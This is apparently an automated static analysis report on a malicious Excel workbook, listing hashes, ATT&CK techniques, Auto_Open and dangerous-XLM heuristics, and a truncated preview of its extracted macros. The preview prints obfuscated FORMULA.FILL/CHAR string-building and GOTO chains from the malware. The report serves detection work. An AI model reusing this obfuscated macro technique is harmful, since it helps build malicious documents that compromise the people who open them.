Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e64664375b1615bd…

MALICIOUS

Office (OLE)

169.5 KB Created: 2020-05-13 12:29:29 Authoring application: Microsoft Excel First seen: 2020-09-07
MD5: fb37a1e677e415974f090fc45314dfe2 SHA-1: c1d0976389ed526830420bbf93bd544b741f064e SHA-256: e64664375b1615bd87764e8445414feddb0224e2a81230024eb344900783611f
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The file contains Excel 4.0 macros, specifically triggering an Auto_Open event. Critical heuristics indicate the use of dangerous formula APIs, including the RUN function, suggesting an attempt to execute arbitrary code. The macro attempts to construct a string using CHAR and arithmetic operations, likely to form a command or payload.

Heuristics 3

  • Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 129349 bytes
SHA-256: 2dc0d98bec8d73bfc6b8c14a230be3f6086a007b417c048af22e32023fa457ec
Preview script
First 1,000 lines of the extracted script
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  Sheet
' 0018     28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d  Sheet!DS17333 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
'  Sheet,IF3,"",-0.31437125748502992018
'  Sheet,FC98,"",17.89898989898989967173
'  Sheet,ER114,"",0.71428571428571430157
'  Sheet,DM140,"",-431.00000000000000000000
'  Sheet,FS208,"",1367.00000000000000000000
'  Sheet,IS271,"",2.00404858299595156623
'  Sheet,O299,"",-279.00000000000000000000
'  Sheet,IE342,"",-0.50000000000000000000
'  Sheet,GN352,"",-2.01724137931034475102
'  Sheet,DJ356,"",-2.55844155844155851653
'  Sheet,EO356,"",414.00000000000000000000
'  Sheet,IY357,"",-23.60001953124999829470
'  Sheet,BF378,"",-41.60003906250000227374
'  Sheet,JJ428,"",4.10144927536231840293
'  Sheet,JE460,"",4.04347826086956541047
'  Sheet,JS546,"",-377.20031249999999545253
'  Sheet,ED550,"",0.95141700404858298157
'  Sheet,DK553,"",273.00000000000000000000
'  Sheet,JK572,"",-506.00000000000000000000
'  Sheet,M679,"",1681.00000000000000000000
'  Sheet,HE701,"",13.00000000000000000000
'  Sheet,GX713,"",-24.96001953125000127898
'  Sheet,DQ775,"",1.13360323886639680069
'  Sheet,EG802,"",0.26855123674911662857
'  Sheet,BJ824,"",-5.47540983606557407626
'  Sheet,IU901,"",-19.00000000000000000000
'  Sheet,FA968,"",-0.22335025380710660237
'  Sheet,GC993,"",-538.00000000000000000000
'  Sheet,CD1000,"FORMULA.FILL(CHAR(EP44466*FD60927)&CHAR(EP44466/FM5895)&CHAR(FJ41569*EY9562)&CHAR(IX30255+DN23387)&CHAR(BD47887+DD9479)&CHAR(GB37214/Q56759)&CHAR(DU55636-IX55375)&CHAR(BD47887-K38992)&CHAR(BD47887/EH17998)&CHAR(DU55636/BO58740)&CHAR(DT47650+V24291)&CHAR(IN45982-J26248)&CHAR(DU55636+BJ37680)&CHAR(DU55636+II7611)&CHAR(IX30255-S61646)&CHAR(DT47650*FM20739)&CHAR(DU55636/DD21989)&CHAR(J62209/EN30872)&CHAR(GB37214/DH51096)&CHAR(IN45982*HZ50302)&CHAR(GB37214/CL32245)&CHAR(DT47650-JR32585)&CHAR(FJ41569-HH31651)&CHAR(FJ41569*CW28529),GQ48262)",""
'  Sheet,CD1001,GOTO(GC10480),""
'  Sheet,FD1007,"",-0.30239520958083832003
'  Sheet,IX1043,"",-0.17730496453900709830
'  Sheet,IL1049,"",0.19081272084805653289
'  Sheet,CA1091,"",506.00000000000000000000
'  Sheet,DU1111,"FORMULA.FILL(CHAR(FJ41569+DZ31429)&CHAR(EP44466*ED26199)&CHAR(DT47650/IY14638)&CHAR(EP21599-JB18609)&CHAR(EP21599/GN352)&CHAR(DT47650+FP25584)&CHAR(EP21599-FG34024)&CHAR(DU55636+ED44414)&CHAR(EP44466+R41561)&CHAR(DT47650-EQ3052)&CHAR(J62209/BW45988)&CHAR(IX30255*EL35537)&CHAR(DU55636/EQ53185)&CHAR(EP21599+ID11354)&CHAR(DT47650+FE1432)&CHAR(EP21599/JN65161)&CHAR(GB37214*JH63377)&CHAR(FJ41569/IB1599)&CHAR(EP44466*HW32639)&CHAR(BD47887+JS22956)&CHAR(GB37214/EQ28643)&CHAR(J62209*BT48142)&CHAR(IN45982-GG13869)&CHAR(J62209+JM6492)&CHAR(DT47650+DK46263)&CHAR(EP44466/GK58820)&CHAR(EP44466+BR6568)&CHAR(EP21599-CP34574)&CHAR(EP44466-CB24203)&CHAR(EP21599/HF42662)&CHAR(IX30255-HF46330)&CHAR(GB37214-JE42856)&CHAR(J62209*CS61828)&CHAR(IX30255-JG33187)&CHAR(DT47650/BX24121)&CHAR(EP21599/JB31158)&CHAR(GB37214*V9562)&CHAR(DT47650*CL8238)&CHAR(IX30255+IX6383)&CHAR(FJ41569/DP59289)&CHAR(BD47887+FM27446)&CHAR(BD47887+DV47781)&CHAR(FJ41569/N10602)&CHAR(IN45982+JJ6955)&CHAR(DT47650+FV53977)&CHAR(FJ41569*BO49218)&CHAR(EP21599*IT40560)&CHAR(FJ41569/EY58544)&CHAR(EP44466/FS35436)&CHAR(IN45982+FL23875)&CHAR(EP21599-J22533)&CHAR(BD47887-W55666)&CHAR(DT47650+GG27958)&CHAR(IX30255/DB54336)&CHAR(IX30255-K48302)&CHAR(GB37214*FV43008)&CHAR(DT47650+BI49146)&CHAR(FJ41569/GR30896)&CHAR(J62209+CL3635)&CHAR(GB37214/HH53127)&CHAR(DU55636/DV32463)&CHAR(DU55636/EO59981)&CHAR(BD47887*IH33168)&CHAR(DT47650+CQ34113),JF16297)",""
'  Sheet,DU1112,GOTO(EO37126),""
'  Sheet,CE1129,"",-357.00000000000000000000
'  Sheet,D1132,"",14.56730769230769162448
'  Sheet,CS1138,"",289.00000000000000000000
'  Sheet,CP1146,"",0.23225806451612904246
'  Sheet,BF1187,GOTO(G
... (truncated)